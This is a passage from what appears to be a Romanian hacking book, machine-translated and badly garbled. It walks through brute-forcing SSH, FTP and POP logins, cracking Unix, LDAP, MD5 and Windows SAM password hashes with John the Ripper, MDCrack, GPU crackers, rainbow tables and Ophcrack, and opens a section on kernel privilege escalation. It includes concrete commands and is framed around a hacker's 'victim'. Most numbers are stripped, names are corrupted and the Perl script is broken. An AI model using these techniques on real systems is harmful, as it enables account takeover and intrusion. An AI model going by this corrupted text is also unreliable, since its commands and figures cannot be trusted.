programul PuTTY Pentru a face acest lucru, trebuie să specificați adresa localhost, portul și să selectați Raw ca tip de conexiune Ca răspuns la solicitarea serverului FTP, puteți introduce un nume de utilizator, o parolă și comenzi (Figura B ) Orez B Conectarea la un server FTP local folosind PuTTY Dacă portul este deschis pe serverul piratat, atunci un hacker îl poate accesa folosind protocolul SSH (cu un nume de utilizator și o parolă găsită) Pentru a face acest lucru, puteți utiliza atât programul PuTTY (pe Windows) cât și comanda ssh (pe Linux) Trebuie doar să vă asigurați că utilizatorul are un shell normal, cum ar fi /bin/bash sau /bin/sh în fișierul /etc/passwd, și nu unele /sbln/nologin sau /S n/fa se (un shell fals este un semn că acest utilizator nu va putea lucra în consolă) Astfel, un hacker se poate autentifica ca utilizator legitim și poate executa comenzi în consolă Dacă portul (FTP) este închis și portul (POP - primirea e-mailului) este deschis, se poate ghici parola Ghicirea parolei de la distanță pentru a naviga prin el - Brutus permite și acest lucru, deși căutarea prin POP poate fi ceva mai lentă decât prin FTP Brutus acceptă lucrul prin intermediul unui server proxy Pentru a activa acest mod, trebuie să bifați caseta de selectare Use Proxy și după ce faceți clic pe butonul Define din caseta de dialog care apare, introduceți tipul și adresa serverului proxy, precum și numărul portului acestuia (Fig B ) Dacă serverul proxy necesită un nume de utilizator și o parolă, acestea ar trebui, de asemenea, introduse mai jos Orez B Caseta de dialog Brutus Proxy Settings Acum să ne uităm la un program BruteSSH simplu, care vă permite să ghiciți de la distanță parola unui anumit utilizator folosind protocolul SSH Porniți mașina virtuală cu Vask Tgask și conectați-vă ca root cu parola sau În consolă, porniți rețeaua: /etc/init d/networking start Când pornește serviciul de rețea, porniți interfața ferestrei cu comanda startx Folosind un editor de text, creați un fișier cu o singură parolă pe linie Nu trebuie să introduceți multe parole, patru-cinci sunt suficiente Să fie printre ele și parola Salvați fișierul în directorul /pentest/passwords/brutessh ca aa txt Din meniul principal, accesați BackTrack ► Escalare privilegii ► PasswordAttacs ► OnlineAttacs ► BruteSSH pentru a porni programul BruteSSH Va apărea o fereastră de consolă, care vă solicită să utilizați programul După aceea, rulați programul cu următoarea comandă: /brutessh ru -h -u root -d aa txt Dacă ați făcut totul corect, programul va găsi parola utilizatorului root, așa cum se arată în fig B În total, pachetul de distribuție al Vac Tgask conține programe pentru spargerea parolelor de la distanță, inclusiv brute-forcer-uri bine-cunoscute precum Hydra și Medusa Aceste programe, pe lângă SSH, vă permit să lucrați cu multe alte protocoale ѲV Ghicirea parolei de la distanță Orez B Ghicirea parolei de la distanță cu BruteSSH Pentru cei cărora le este greu să înțeleagă interfața liniei de comandă, există un program Xhydra (HydraGTK) cu o interfață grafică Programul Hydra poate funcționa nu numai cu o singură țintă, ci și cu o listă de ținte Există și o versiune pentru Windows Un exemplu de funcționare a programului Medusa este prezentat în fig V Orez V Ghicirea parolei de la distanță folosind programul Medusa În capitolul următor, vom trata subiectul spargerii parolelor locale Schimbarea parolelor locale Cracking hash-uri parole *pix-systems Instrumentul clasic de spargere a parolelor Unix este John The Ripper (www openwall com) Hackerii o numesc afectuos „jonik” Cum pot cădea hash-urile parolelor în mâinile unui hacker? În primul rând, uneori (de exemplu, în PC-Linux) hash-urile parolei sunt conținute în fișierul /etc/passwd, la care toată lumea are acces de citire În al doilea rând, pentru unele sisteme există exploit-uri care vă permit să schimbați proprietatea de grup a oricărui fișier, iar în acest fel un hacker poate vizualiza fișierul /etc/shadow În al treilea rând, unii administratori copiază fișierul /etc/shadow înainte de a-i face modificări și partajează din greșeală accesul de citire la copia fișierului În al patrulea rând, folosind exploit-ul corespunzător, un hacker poate obține drepturi de superutilizator (și acces pentru a vizualiza toate fișierele) și poate afla parolele utilizatorilor legitimi, inclusiv utilizatorul root Programul JTR (John The Ripper - John the Ripper) a fost scris inițial pentru sisteme de tip Unix, dar apoi a fost portat pe Windows O avem în distribuția Vask Tgask , iar versiunea pentru Windows poate fi descărcată gratuit de pe site-ul dezvoltatorului Primul pas este să combinați fișierele /etc/passwd și /etc/shadow folosind utilitarul unshadow Veți obține un fișier bazat pe /etc/passwd, în care asteriscurile sau crucile vor fi înlocuite cu hash-uri de parolă Acest lucru se face după cum urmează: unshadow passwd shadow-file > rezultat-fișier Rezultatul arată cam așa: root: JhAraBYwfjR :O:O:root:/:/ bin/bash mac:GGCfyAEua zllc: : : service-myserver porumb - POP: /home/mac: /bin/sh pincher:ySb B nseVzEo: : :Pitch:/home/pincher:/bin/sh uis: IBHwrKKVEA: : :thisserver com - POP:/home/luis:/bin/sh Dacă ați denumit fișierul rezultat passwd, atunci pentru a pirata este suficient să executați comanda (pe Windows, utilizați comanda john-mmx în loc de john): john passwd C Schimbarea parolelor locale Lucrarea de spargere a parolelor poate fi întreruptă apăsând Ctrl+C Sesiunea curentă va fi salvată în fișierul john rec (în mod implicit) De asemenea, este salvat în acest fișier la fiecare minute de funcționare a programului Pentru a relua o sesiune întreruptă, utilizați comanda john restaurare Pentru a vedea parolele deja sparte, executați comanda john show passwd Programul stochează toate hashurile și parolele sparte în fișierul john pot, care poate fi vizualizat cu ușurință cu un editor de text Acestea sunt doar elementele de bază, iar acum vom afla cum sunt utilizate diferite caracteristici non-triviale ale programului Ar trebui mai întâi să încercați să rulați john în modul single Acesta este cel mai rapid mod în ceea ce privește timpul de execuție În acest mod, programul încearcă să ghicească parola pentru fiecare utilizator, folosind informațiile suplimentare disponibile din fișierul /etc/passwd: autentificare, nume și prenume real, număr de telefon În acest caz, se aplică unele transformări, de exemplu, se încearcă autentificarea utilizatorului ca parolă, scrisă de la dreapta la stânga sau cu adăugarea de sufixe precum „ed”, „s”, diverse numere De asemenea, unele litere din parolă sunt înlocuite cu numere similare în ortografie Comanda pentru a rula programul john în acest mod arată astfel: john single users txt Aici fișierul users txt conține informațiile despre utilizator menționate În cazul nostru, ar trebui găsită parola pentru utilizatorul pincher, pltched Apoi, puteți rula o căutare în dicționar Programul vine cu un mic dicționar al celor mai frecvent utilizate parole: password Ist Linia de comandă arată astfel: john wordlist=parolă lst utilizatori txt Pentru a enumera nu numai cuvintele din dicționar, ci și diferitele lor variații, utilizați opțiunea - - r u es: john rules wordlist=parolă lsț users txt Timpul de rulare al programului în acest caz va crește de câteva ori, dar crește și probabilitatea de a găsi parola Vă recomand cu căldură să găsiți un dicționar de nume de femei pe Internet, acestea fiind adesea folosite ca parole atât de bărbați, cât și de femei De asemenea, dacă cunoașteți naționalitatea utilizatorului, un dicționar pentru limba respectivă vă poate ajuta Dacă dicționarul nostru conține numele richard, atunci va fi găsită și parola utilizatorului luis Dacă nu, atunci nu vă descurajați - puteți utiliza cel mai puternic mod de program - enumerare completă: john incremental:alnum users txt Aici al num este numele setului de caractere (litere și cifre) Dacă nu este specificat (adică este pur și simplu scris - -incremental) sau opțiunea all este setată ( incremental:al ), Cracking hash-uri parole *pix-systems apoi iterația trece peste toate caracterele posibile, inclusiv caracterele speciale și spațiul În viața reală, are sens să încerci mai întâi doar numere (cifre), apoi doar litere (alfa) Dacă parolele constau doar din cifre sau doar din litere, acestea vor fi găsite mult mai repede În exemplul nostru, după ce a trecut ceva timp, programul va găsi parola pentru utilizatorul mac - titanic Câteva opțiuni suplimentare utile pentru selectarea utilizatorilor În toate cazurile, un semn minus (-) în față servește pentru a exclude utilizatorii specificați (toți cei rămași sunt selectați) users=[-'JLOGIN|UID[ ] Vă permite să selectați doar câțiva utilizatori pentru spargerea parolelor sau alte acțiuni groups=[-]GID[ ] Determină programul să încarce (sau să nu încarce) informații despre utilizatori numai din grupurile specificate shells=[-]SHELL[, Determină programul să încarce utilizatorii cu shell-ul specificat [fără shell-urile specificate] Exemplul nostru a folosit hash-uri Unix tradiționale (criptate cu algoritmul DES) Primele caractere se numesc sare (sare) Acestea sunt criptate folosind parola utilizatorului ca cheie Din sistemele moderne cunoscute de mine, astfel de hashuri sunt folosite, de exemplu, în sistemul de operare Solaris (și SunOS) Pe sistemele open source (cum ar fi Linux și FreeBSD), algoritmul DES nu poate fi utilizat deoarece guvernul SUA a impus o restricție privind exportul codurilor sursă pentru programele care implementează acest algoritm Prin urmare, FreeBSD și Linux folosesc algoritmul MD Astfel de hashuri sunt mai lungi și încep întotdeauna cu caractere $ Programul JTR le numește hash FreeBSD MD Uneori, alți algoritmi de hashing sunt utilizați în Linux De exemplu, în cazul algoritmului BlowFish, hashurile încep cu caracterele $ John The Ripper recunoaște automat algoritmul hash și îl raportează utilizatorului Dacă același fișier de parole folosește algoritmi de hashing diferiți pentru utilizatori diferiți, atunci trebuie să le spargeți parolele una câte una (John poate sparge doar un tip de hash la un moment dat) Ubuntu Linux (WackTrack ) acceptă noul algoritm de hashing SHA- , unde hashurile încep cu USD și John nu îl recunoaște Din punct de vedere al securității, avantajul hashurilor FreeBSD MD față de cele tradiționale este că durează mai mult pentru a calcula Din această cauză, viteza de forță brută a parolei în JTR este mult mai mică (pe sistemul meu este de aproximativ de comparații pe secundă), așa că spargerea parolelor reale este foarte dificilă Un alt avantaj al MD este că lungimea maximă C Schimbarea parolelor locale parola este de caractere, în timp ce în cazul unei parole tradiționale Unix este de doar caractere Programul JTR face o treabă excelentă în spargerea hashurilor tradiționale Unix, deoarece nu folosește algoritmul standard DES, ci propria sa versiune, foarte optimizată pentru viteză De asemenea, este interesant faptul că, spre deosebire de majoritatea programelor de cracking, John implementează un algoritm de forță brută de parolă „sprețuit”, atunci când sunt verificate mai întâi cele mai probabile combinații de caractere din punctul de vedere al limbii engleze Astfel, lungimea parolei nu crește secvențial, ci fluctuează, adică pot fi verificate mai întâi parolele de caractere, iar apoi cele de caractere, formate din caractere mai puțin obișnuite Pe lângă *pіh-hash-uri, programul JTR poate „spărge” hash-urile parolei în MySQL, MSSQL, Oracle etc - aproximativ de tipuri diferite de hashuri în total Ce concluzii se pot trage în ceea ce privește propria lor securitate? Folosiți parole lungi (parola căsuței mele poștale are - de caractere) și nu utilizați niciodată parole numerice pure Parola nu trebuie să fie un cuvânt din dicționar sau o simplă modificare a acestuia Trebuie să conțină un amestec de litere mari și mici, numere și caractere speciale De asemenea, ar trebui să schimbați parolele periodic, în special parola de superutilizator De exemplu, dacă o parolă Linux suficient de lungă și complexă este schimbată la fiecare luni, atunci când un hacker sparge un hash greu de găsit, parola va avea deja timp să devină depășită Caracteristici de spargere a parolelor LDAP Protocolul LDAP este uneori folosit pe sistemele *nix În acest caz, în fișierele standard /etc/passwd și /etc/shadow sunt stocate doar informații despre utilizatorul root și despre utilizatorii sistemului, în timp ce informațiile despre utilizatorii „simpli” sunt stocate în baza de date LDAP Folosind un utilitar standard, aceste informații pot fi extrase într-un fișier text Hash-urile *nir-parole din acesta sunt codificate suplimentar cu algoritmul base Deci, pentru a le readuce la normal, trebuie să utilizați programul ldap pw de pe site-ul oficial al producătorilor programului John The Ripper (http://www openwalLcom/lists/john-users/ / /ll/l ) Programul este mic, așa că voi da textul complet: #! /usr/bin/perl -w folosiți strict; utilizați MIME::Base ; while( <> && ! eof) { # avem nevoie de eof deoarece vom lovi eof pe altele<> chomp; Hacking MD și alte câteva hashe-uri my( $uid, $passw, $cn, $dn); $cn = $uid = ''; while( <> ) { # obține un obiect chomp: ultimul dacă /x\s*$/; # obiect are linii goale între atunci if( hsp: ( +)/ ) { $cn = $ ; } elsif( rdn: ( +)/ ) { $dn = $ : } el sif( /'userP\w+:: ( +)/) { $passw= substr( decode base ($l), ); #assuming {criptă} } elsif( ruid: ( +)/) { $uid = $ ; } } prinț "$uid\:$passw\:\:\:$cn\n" dacă este definit $passw: # numai ieșire dacă obiectul are parolă } Ar trebui să vă conectați la sistemul studiat ca root și să rulați programul de căutare Idap și să redirecționați rezultatul acestuia către programul ldap pw, care va salva parolele în fișierul Idap pw: Idapsearch -D „ ” -w xxxxxx -b „ userpassword uid cn | ldap pw > Idap pw Apoi ar trebui să „alimentați” fișierul Idap pw lui John Hacking MD și alte câteva hashe-uri Cu câțiva ani în urmă, poate cel mai bun instrument Windows pentru cracarea în masă și rapidă a hashurilor MDS a fost programul MD Inside dezvoltat de InsidePro (Fig C ) La acel moment, a arătat miracole de performanță - mai mult de milioane de hashe-uri pe secundă Programul a fost și rămâne gratuit, dar acum suportul său a fost întrerupt Nu se mai află pe site-ul oficial al producătorului, dar poate fi găsit în continuare pe Internet Acum InsidePro a lansat PasswordsPro, un program care vă permite să spargeți diferite tipuri de hashuri, dar acest program este plătit Suportul multithreading este implementat în programul gratuit MDCrack ( de algoritmi de hashing), îl puteți descărca de pe http://mdcrack openwall net Acest program poate fi rulat doar din linia de comandă Suportul multithreading este implementat și în programul gratuit Windows MDCrack ( de algoritmi de hashing), îl puteți descărca de pe http://c rb r openwall net/mdcrack/ Acest program este rulat din linia de comandă C Schimbarea parolelor locale Instrumente de editare a fișierelor Căutare? Nume j MP -HASH ~ , Parola D D CD F B E ECF E □ Test l C CA A B DCC A F B □ Test C AD D FE AA AOC BFF Te$t CB AC B B D B □ Te$t DC BDB D DC DBD ED Test CCB EEA A C C A F E B Test A FC E A FA A B EACBE Test AB B FC B F D DE D C E A A Test ABC FBDD B DFOC F B A D E ( Test ABCD CB CA A BB F C A CA Test ABCDE ECDDE D F B EA D Test a CC B C F B A C E a Te$t ab EF D CC F DC B F EBA ab Test abc CD FB D F D E F abc Test abcd E FC C EE F CD E F F abcd Test abcde AB B D B ACC AF D B abcde Test ? E E F C C C D C C B TestJ@ EBCAE E F AD DF E CB Test !@# F A C DE C B E Parolă- |pxhtml Orez С Programul MD Inside de la Inside Pro Orez С Programul MDCrack la pornire (hash CISCO-MD -IOS) (Figura C ) În prezent, a fost dezvoltat un shell grafic pentru Windows MDCrack GUI, dar, să fiu sincer, funcționează foarte „strâmb” În tabel C prezintă date de pe site-ul programului, pe baza cărora este posibil să se judece performanța acestuia în sistemul de testare (procesor x XEON GHz) pentru cele unsprezece tipuri de hashuri cele mai comune Hacking MD și alte câteva hashe-uri Tabelul C Măsurarea performanței MDCrack Debit de tip hash (hash-uri pe secundă) MD MD NTLM РІХ PIX-U MD HMAC-MD HMAC-MD FreeBSD iOS Apache Să lucrăm puțin cu programul MDCrack Folosind calculatorul hash încorporat în Cain (http://oxid it), am calculat unele dintre hashurile comune pentru parola de test (appa ) Programul Caip în sine are și capacitatea de a sparge diferite tipuri de parole Este posibil ca numele tipului hash să nu se potrivească întotdeauna cu cele utilizate în MDCrack (Tabelul C ) Tabelul C Tipuri de hash în MDCrack Tip hash Valoare hash MD BA E CD B DB A F MD DF BA B C D A MD F D EC B E EF BCCB D SHA- CF EDADF BDD D CD BB F D D B RIPEMD- E BF D DD B DD CC C B CE LM FDAE B AF E NT B C B F B E FDFC D C C MySQL CE F A MySQLSHAl AB C D BBB BE FC A FF Cisco PIX oE ukqotAxkFHBSg VNC Hash BB D C E O mică problemă - toate hashe-urile sunt obținute fără utilizarea „sării” și fără prefixe, uneori specifice acestora în anumite sisteme Pentru a ghici tipul hash, puteți folosi programul cu opțiunea -guess: MDCrack-sse exe guess hash Programul verifică pur și simplu hash-ul pentru similitudine cu tipurile cunoscute și, după ce a emis o concluzie, își finalizează munca Cu toate acestea, această opțiune nu funcționează întotdeauna zo C Schimbarea parolelor locale bine, adesea oferă destul de mulți algoritmi hash posibili De exemplu, hash-ul MD ( DF BA B C D A ) a fost recunoscut de program ca posibil MD , MD , MD , PHP, MD MD , MD MD Prin urmare, este mai bine să specificați în mod explicit tipul de hash, de obicei, acesta este cunoscut de hacker din informații despre sursa originii sale De exemplu, el știe că în motorul unui anumit site, parolele sunt hashing de către algoritmul MD succesiv de două ori md (md ), iar apoi, desigur, alege opțiunea MD MD ca tip de algoritm Observ că multe motoare moderne de forumuri, bloguri și generatoare de site-uri folosesc (pentru a face hacking-ul dificil) combinații din ce în ce mai sofisticate de funcții hash în algoritmi de obținere a hash-urilor de parole, ca răspuns la care autorii multor brute-forcer, inclusiv MDCrack, implementați hacking-ul unor astfel de algoritmi combinați „sprețuiți” (consultați documentația programului) Seturile de caractere utilizate pentru enumerare sunt specificate după cum urmează (în parametrul set de caractere): Despre arme nucleare - toate litere mari în limba engleză; О ЯІ - toate litere mici engleze; Despre YAR - toate caracterele de punctuație; Despre NM - toate cifrele; Despre YaS - toate caracterele de control De asemenea, puteți adăuga propriile caractere sub formă de coduri care nu se află pe tastatura standard engleză Deci, vom compune o linie de comandă pentru spargerea acestui hash, vom alege prioritatea sarcinii ca de obicei Semnificația parametrilor utilizați nu ar trebui să provoace întrebări speciale, dacă totuși apar, rulați programul cu opțiunea - - hei p sau citiți conținutul fișierului HELP txt MDCrack-sse exe algorithm=MD minsize- maxs ze= charset=РІ НМ prority=NORMAL autosave=ON DF BA B C D A Pe aparatul meu, parola anna a fost găsită foarte repede: în minut secunde și milisecunde (Figura C ) Programul vă permite să luați nu numai un hash din linia de comandă, ci mai multe dintr-un fișier O adevărată descoperire în hash cracking a fost utilizarea capacităților de calcul ale plăcilor video moderne (tehnologia CUDA) În acest caz, placa video poate efectua simultan multe de același tip de operații matematice Titlul mândru de cel mai rapid hash cracker MD din lume (World Fastest MD Cracker) este deținut de programul BarsWF al lui Mikhail Svarichevsky (http:// by/ru/md ) Cu placa mea video GeForce GT , programul generează - milioane de hashe-uri pe secundă, plus pe două nuclee de procesor - - de milioane de hashe-uri pe secundă Debitul total este în medie de - milioane de hashe-uri pe secundă (Figura C ) Hacking MD și alte câteva hashe-uri Orez ѲС З MDCrack atunci când rulează pe două fire Orez С BarsWF la serviciu BarsWF este ideal dacă trebuie să spargeți un hash de parolă în cel mai scurt timp posibil, de exemplu, dacă acest hash nu se află printre bazele de date disponibile pe Internet (cum ar fi http://md list ru) Pentru a-l rula, trebuie doar să specificați linia de comandă cu hash-ul parolei și setul de caractere folosit, de exemplu: barswf cuda x -h lb e fd d al ald cb f b ca -c aAz- restul opțiunilor programului sunt opționale O alternativă la programul BarsWF, care folosește și un GPU (unitate de procesare grafică), este programul IGHASHGPU de Ivan Golubev ѲС Schimbarea parolelor locale (http://golubev com/hashgpu htm) Este capabil să recupereze parolele din hashurile SHA , MD și MD Acest program funcționează atât cu plăci video NVIDIA care acceptă tehnologia CUDA, cât și cu plăci ATI RW X Programul, ca și BarsWF, este lansat din linia de comandă, iar kitul de distribuție are un exemplu de fișier batch example cmd: ghashgpu exe /h:cbeld d ecle a f a a d /t:md /c:sd /max: pauză Vederea programului de rulare este ilustrată în fig С Orez С IGHASHGPU în acțiune Pe sistemul meu, rata medie de hash a programului IGHASHGPU este puțin mai mică decât cea a BarsWS ( milioane pe secundă față de ), deoarece IGHASHGPU utilizează doar resurse de coprocesor grafic (GPU), iar unitatea centrală de procesare (CPU) nu este folosit Acest lucru se datorează faptului că, odată cu utilizarea intensivă simultană a procesorului și a GPU-ului, computerul îngheață foarte mult și aproape că nu răspunde la mișcările mouse-ului și la apăsările de la taste (așa se întâmplă exact când BarsWF rulează) IGHASHGPU este, de asemenea, gratuit pentru moment Am găsit parola de test rogerl furnizată cu programul în minute și de secunde În plus, în , Ivan Golubev a dezvoltat programul comercial Accent RAR Password Discovery pentru spargerea parolelor de arhivă RAR folosind un GPU Spre deosebire de versiunile gratuite, programul este echipat cu o interfață grafică ușor de utilizat (Fig C ) Populare acum sunt așa-numitele tabele curcubeu (Rainbow Tables) pentru selecția nu numai a hashurilor standard MB pe de biți, ci și a altora Hacking MD și alte câteva hashe-uri Orez С Fereastra Accent RAR Password Discovery (LM, NTLM, SHA ) Tabelele gata făcute și programele care funcționează cu acestea pot fi descărcate gratuit de pe Internet Un dezavantaj semnificativ al unor astfel de tabele este cerințele mari pentru spațiu pe disc Cu toate acestea, odată cu proliferarea hard disk-urilor terabyte, acest dezavantaj devine rapid un lucru din trecut Totuși, există un al doilea dezavantaj, unul mai serios: tabelele durează foarte mult să se descarce de pe Internet, chiar și folosind torrente În scopurile noastre de învățare, am folosit http://www freerainbowta-bles com/en/tables/ Din acesta pot fi încărcate mai multe varietăți de tabele curcubeu (în funcție de algoritmul de hashing, precum și de lungimea maximă a parolei și de setul de caractere utilizat în ea) Pentru a facilita descărcarea, toate tabelele sunt împărțite în părți și prezentate ca link-uri torrent Volumul tuturor tabelelor disponibile pe site este în prezent de TB Prin urmare, proprietarii site-ului oferă să vă trimită discuri personalizate cu fișierele necesare pentru o taxă moderată oriunde în lume Tabelele de pe acest site sunt generate într-un format personalizat pentru a reduce utilizarea spațiului pe disc (până la %!) Pentru a lucra cu ele, ar trebui să utilizați programul rcracki (prescurtare de la rcrack improved - improved rcrack), care poate fi descărcat de pe pagina corespunzătoare a acestui site Pentru a utiliza foile de calcul originale rainbowcrack cu un alt program, puteți converti foile de calcul folosind utilitarul rti rto, care este disponibil și pe pagina de descărcare a acestui site ѲС Schimbarea parolelor locale Cu ajutorul programului pTorrent, am descărcat părți din tabelul md âlphâ-space l- de pe Internet într-o săptămână (în total GB, ceea ce era acceptabil pentru mine ca dimensiune) Fiecare parte este un folder separat care conține multe tabele mai mici Cu toate acestea, am calculat „puțin” greșit, presupunând că desemnarea alfa sunt toate litere Se pare că toate literele din numele tabelelor sunt codificate ca mi ha pha (adică un amestec de litere), literele mici sunt codificate ca oweral pha, iar ceea ce am descărcat s-a dovedit a fi un tabel pentru parole numai din majuscule litere (de la la caractere) Numerele sunt notate numerice, spațiile sunt notate ca spațiu Adică, din punct de vedere practic, fișierul md mixalpha-numeric-space#l- este de cel mai mare interes pentru utilizare cu programul, dar „cântărește” până la GB, ceea ce este puțin prea mult chiar și pentru hard diskul meu de GB, iar timpul de descărcare va fi pur și simplu uriaș Pentru a vă arăta în sfârșit cum să lucrați cu tabelele curcubeu, am generat un hash din cuvântul „NIMDADMIN” și am rulat programul cu următoarea comandă (conform instrucțiunilor atașate): rcrackijnt -h c d dcf b beb c al -t -o save txt F:\md alpha-space l- Programul a analizat secvenţial un număr de tabele mici şi, după ce a lucrat puţin mai mult de două minute, a produs un rezultat (Fig C ) De fapt, timpul de cracare poate fi de câteva ori mai mare, doar că parola s-a dovedit a avea succes Dar, pe de altă parte, o astfel de viteză cu o lungime a parolei de litere pentru un brute-forcer este pur și simplu de neatins Orez С Rezultatul programului rcracki mt, parola găsită este NIMDADMIN Cracarea hash-urilor parolei Windows Cracarea hash-urilor parolei Windows Unii cititori ai primei ediții au fost surprinși de faptul că a fost acordată atât de puțină atenție sistemului de operare Windows din carte În a doua ediție, noi, cel puțin parțial, le îndeplinim dorințele Când spargeți parolele Windows, fiecare are propriile preferințe Cineva folosește programe plătite, cuiva îi plac programele gratuite Fără a pretinde că sunt complet, vă voi povesti despre programul modern ophcrack, care este dezvoltat de echipa dezvoltatorilor săi Site-ul web oficial al programului (http://ophcrack sourceforge net/) pare foarte concis și elegant (Figura C ) Un scurt rezumat de pe site ne spune că Ophcrack este un cracker gratuit de parole Windows bazat pe tabel curcubeu Implementarea Notă I Pagina Pioject | Descărcați | tabele | Stiri | A sustine Ophcrack este un descifrator gratuit de parole Windows bazat pe tabele curcubeu Este o implementare foarte eficientă a tabelelor curcubeu realizată de inventatorii metodei Vine cu o interfață grafică cu utilizatorul și rulează pe platforme multiple Rulează pe Windows, Linux/Unix, Mac OS X, Crapă hashurile LM și NTLM Mesele gratuite disponibile pentru Windows XP și Vista Modul de forță brută pentru parole simple Modul de auditare și export CSV Grafice în timp real pentru a analiza parolele LiveCD disponibil pentru a simplifica cracarea Încarcă hash-uri din SAM criptat recuperat dintr-o partiție Windows, inclusiv Vista Software gratuit și open source (GPL) Descărcați ophcrack AII pl"tform" Descărcați ophcrack LiveCD Fără instalare c OBIECTUL F SECURITt |sourceforge Orez C Site-ul Ophcrack C Schimbarea parolelor locale mesele curcubeu este foarte eficientă, a fost făcută de inventatorii acestei metode Programul are o interfață grafică cu utilizatorul și rulează pe multe platforme (inclusiv Linux) Programul „sparge” hashurile LM și NTLM O noutate recentă interesantă a dezvoltatorilor Ophcrack este apariția discurilor de pornire (LiveCD) cu programul (desigur, nu necesită instalare) Există tipuri de astfel de discuri - pentru Windows XP și pentru Windows Vista (cel din urmă funcționează și cu Windows ) Discurile sunt disponibile ca imagini ISO Având acces fizic la computerul victimei (și poate deveni propriul computer dacă ați uitat brusc parola de utilizator dintr-un anumit motiv), porniți de pe acest disc și utilizați programul Ophcrack nu numai pentru a extrage fișiere cu nume de utilizator și parole Windows, ci și efectuați imediat selecția parolelor Astfel de discuri pot deveni un instrument indispensabil pentru un administrator de sistem sau administrator de securitate a informațiilor, Orez ѲС Fereastra programului Ophcrack sub Windows XP la începutul lucrului Cracarea hash-urilor parolei Windows efectuarea unui audit al siguranței parolei angajaților, chiar dacă aceștia nu se află la locul de muncă Discurile conțin deja tabelele curcubeu corespunzătoare pentru exact versiunea de Windows pentru care sunt „ascuțite” În timp ce atunci când descărcați un fișier executabil instalat sub Windows, tabelele trebuie descărcate separat, pe de altă parte, puteți descărca oricare dintre tabelele de pe un computer care rulează Windows XP, de exemplu, pentru a sparge fișierele cu parole „extrase” pe un computer cu Windows Vista sau Seven instalat Unele dintre mese, de exemplu, pentru limba germană, sunt plătite Dar nu prea avem nevoie de ele Am descărcat programul de instalare Ophcrack de pe site și am instalat programul pe computer Fereastra Windows Ophcrack are o interfață simplă, frumoasă și intuitivă (Figura C ) Tabelele gratuite pentru Vista și XP au fost descărcate chiar mai devreme Prin acord cu prietenul meu, am copiat fișierele de sistem de parole SAM și SYSTEM din directorul C:\Windows\system \config pe unitatea mea flash de pe computerul său cu Windows Pentru a face acest lucru, desigur, a trebuit să pornesc de pe un disc Linux De asemenea, poți folosi Vask Tgask sau te poți descurca cu Kasperky Rescue Disk dacă îl pornești în modul text și știi să folosești puțin programul Midnight Commander (seamănă cu FAR, Volkov și alți „comandanți” pentru DOS și Windows, doar interfața este mai slabă) Prin meniul Load ► Encypted SAM, am specificat locația folderului cu fișiere de parole, iar Ophcrack le-a procesat cu succes, încărcând nume de utilizator într-o codificare de neînțeles și hash-uri NT ale parolelor lor După aceea, am conectat tabelele pentru Vista, specificând locația folderului cu ele Apoi am dat clic pe butonul Crack De fapt, tabele nu au fost necesare în acest caz, deoarece Ophcrack a recunoscut imediat parolele goale (vide) imediat după încărcare, iar cunoștințele mele despre Windows Vista și Windows sugerau că acestea sunt conturile de Administrator și Guest (personajele, desigur, ar putea să nu fie decodificate fără ambiguitate, dar numărul lor a fost exact același ca în aceste conectări) Parola utilizatorului principal, contrar așteptărilor mele, a fost spartă de o simplă forță brută (primele parole Ophcrack cu forță brută de la la caractere, apoi utilizează tabele curcubeu) Da, parola utilizatorului, ca tot ce este ingenios ©, s-a dovedit a fi surprinzător de simplă (Fig ) Acum din nou despre discurile de pornire Ophcrack - trebuie să te învăț sau poți să o faci singur și să auditezi parolele pe propriul tău computer ca teme? © NOTĂ - Pentru a inscripționa izo-imagini ale discurilor descărcate de pe http://ophcrack sourceforge net/, un program precum Nero Burning ROM este în regulă ѲС Schimbarea parolelor locale Orez OS Fereastra Ophcrack după spargerea parolelor Ghicirea parolei locale pe computerul victimei Uneori, un hacker trebuie să ghicească parola locală pe computerul pe care vrea să devină root În opinia mea, această opțiune este aproape fără speranță, dar se întâmplă că pur și simplu nu există alte posibilități Puteți scrie un script folosind comanda ssh -T sau su Dacă hackerul lucrează fără drepturi de nimeni, atunci problema este lipsa unui pseudo-terminal Hackerii experimentați recomandă utilizarea interpretului aștept, care script-uri includ suport pseudo-terminal Trebuie să instalați expect pe mașina piratată (ceea ce nu este o sarcină ușoară fără drepturi de superutilizator) și apoi să scrieți scriptul bruteforce exp care implementează brute-force folosind comanda su Ghicirea locală a parolelor pe computerul victimei După rularea unui astfel de script în fundal (pentru aceasta, caracterul & este indicat la sfârșitul comenzii), hackerul trebuie să aștepte până când parola corectă apare în fișierul de ieșire Pentru a contracara o astfel de forță brută a parolei, multe sisteme moderne au adăugat o întârziere la execuția comenzii su Elevație de privilegii Dacă aveți acces la shell pe un computer cu un sistem *pix, fiecare hacker care se respectă va încerca să-și ridice privilegiile la nivelul de superutilizator (rădăcină) În engleză, aceasta se numește „escaladare a privilegiilor” sau „elevare a privilegiilor” (escaladare sau ridicare a privilegiilor) Escaladarea privilegiilor necesită un exploit care exploatează (folosește) o anumită vulnerabilitate cunoscută În Linux, exploit-urile care funcționează cu nucleul (kernel-ul) sistemului sunt cel mai des folosite Acestea trebuie să fie potrivite cu o anumită versiune de kernel, iar marca producătorului Linux (de exemplu, Ubuntu, Fedora sau Red Hat) de obicei nu contează Ne vom uita la escaladarea privilegiilor folosind Damn Vulnerable Linux ca exemplu Pentru lucrări suplimentare, folosim exploit-ul de pe site-ul exploit-db com Cunoscutul site de hacking MilwOrm, unde au putut fi găsite multe exploit-uri, s-a închis în Damn Vulnerable Linux are o arhivă întreagă de exploit-uri de pe site-ul MilwOrm în directorul /pentest/exploits/milwOrm, dar este datată și nu conține exploit-ul care ne interesează Exploit-urile din arhivă sunt distribuite pe platforme (directorul platformelor), pe tipuri (local - directorul local sau la distanță - directorul la distanță), precum și după numerele de porturi utilizate de acest serviciu (directorul porturi) Exploit-urile de pe site-ul exploit-db com sunt numerotate la fel ca pe site-ul MilwOrm Deschideți o fereastră de consolă și comutați la utilizatorul neprivilegiat nobody (folosind comanda su nobody), așa cum se arată în Figura D , apoi treceți la directorul /tmp (folosind comanda cd /tmp) Acest director are acces de scriere pentru toți utilizatorii Utilizați comanda uname -a pentru a afișa informații despre mașină După cum puteți vedea, sistemul de operare Linux are o versiune de kernel Deci, trebuie să căutăm un exploit pentru această versiune Căutăm pe Google cuvintele „Linux kernel local root exploit” (exploatare locală Linux kernel pentru a obține drepturi de root) Acest exploit poate fi numit și „Linux kernel Local Privilege Escalation” Site-ul exploit-db com este bun, deoarece puteți găsi versiuni funcționale ale exploit-urilor pe el, în timp ce pe alte site-uri pot fi corupte în mod deliberat, astfel 